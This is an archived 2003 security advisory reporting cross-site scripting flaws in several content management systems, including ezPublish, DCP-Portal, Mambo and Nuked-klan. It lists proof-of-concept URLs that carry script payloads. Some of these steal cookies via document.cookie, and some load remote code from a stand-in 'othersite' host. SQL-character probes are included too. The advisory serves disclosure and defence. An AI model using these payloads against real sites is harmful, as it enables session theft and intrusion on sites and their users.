Visit our newest sister site!
Hundreds of free aircraft flight manuals
Civilian • Historical • Military • Declassified • FREE!


TUCoPS :: Web :: CMS / Portals :: a6074.htm

Various Content Managing Systems XSS



19th Mar 2003 [SBWID-6074]
COMMAND

	Various Content Managing Systems XSS

SYSTEMS AFFECTED

	ezPublish 2.2.7 DCP-Portal v5.3.1 Nuked-klan 1.3b Siteframe 2.2.4  Mambo
	Site Server 4.0 build 10 Basit cms 1.0

PROBLEM

	Ertan Kurt of Olympos Security says :
	
	While searching for a CMS for my site I found out the following:
	
	ezPublish 2.2.7
	
	http://target/search/?SectionIDOverride=1&SearchText=<script>alert(document.cookie);</script>
	
	also when entered an URL like
	
	http://target/<script>alert('test')</script> and site admin checks
	
	latest served URLs the script will run
	
	 Vendor Site: http://www.ez.no
	
	
	DCP-Portal v5.3.1
	
	http://target/search.php?fields=content&q=<script%20src=http://othersite/code.js></script>
	http://target/calendar.php?year=<script>alert(document.cookie);</script>&month=03&day=05
	
	 Vendor Site: http://www.dcp-portal.org
	
	
	Nuked-klan 1.3b
	
	it doesn work if it starts with  <script  but  by  adding  a  ">  the
	script will run
	
	http://target/index.php?file=Liens&op="><script>alert('test');</script>
	
	 Vendor Site: http://www.nuked-klan.org
	
	
	Siteframe 2.2.4
	
	Same "> issue here
	
	http://target/search.php?searchfor="><script>alert('test');</script>
	http://target/download.php?id=2%  (shows some info)
	
	 Vendor Site: http://www.siteframe.org
	
	
	Mambo Site Server 4.0 build 10
	
	http://target/index.php?option=search&searchword=<script>alert(document.cookie);</script>
	
	 Vendor Site: http://www.mamboserver.com
	
	
	Basit cms 1.0
	
	Content module: // Some sql chars and unwanted behaviour (loop->DoS?)
	
	http://target/modules/Content/?op=sec&s=--
	http://target/modules/Content/?op=sec&s='
	http://target/modules/Content/?op=sec&s=;
	
	Submit module:
	
	http://target/modules/Submit/index.php?op=pre&title=<script%20src="http://othersite/code.js">test</script>
	http://target/modules/Submit/index.php?op=pre&title=<script>alert(document.cookie);</script>
	
	Search module:
	
	http://target/modules/Search/index.php?q="><script+src=http://othersite/code.js></script>&op=search
	
	 Vendor Site: http://basitonline.com
	

SOLUTION

	Check vendors site above


TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2014 AOH